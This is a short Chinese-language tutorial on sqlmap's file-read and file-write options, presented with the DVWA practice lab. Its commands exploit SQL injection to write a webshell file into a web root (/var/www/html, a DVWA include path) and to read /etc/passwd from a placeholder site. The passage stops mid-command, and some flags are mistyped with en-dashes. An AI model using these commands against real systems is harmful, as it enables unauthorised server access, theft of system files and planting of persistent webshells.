当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
读取与写入文件
总结举例
当然这个也可以通过手注来写入
最后我们拿一个dvwa 线上靶场,来实现读写操作
读取server服务器文件
在server服务器写入文件
读取与写入文件
首先找需要网站的物理路径,其次需要有可写或可读权限。
•–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
•–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
• –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
#示例:
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”
•file-read 读取web文件
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2
• file-write写入文件到web
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2
使用shell命令:
• sqlmap -r “c:\tools\request.txt” -p id –dms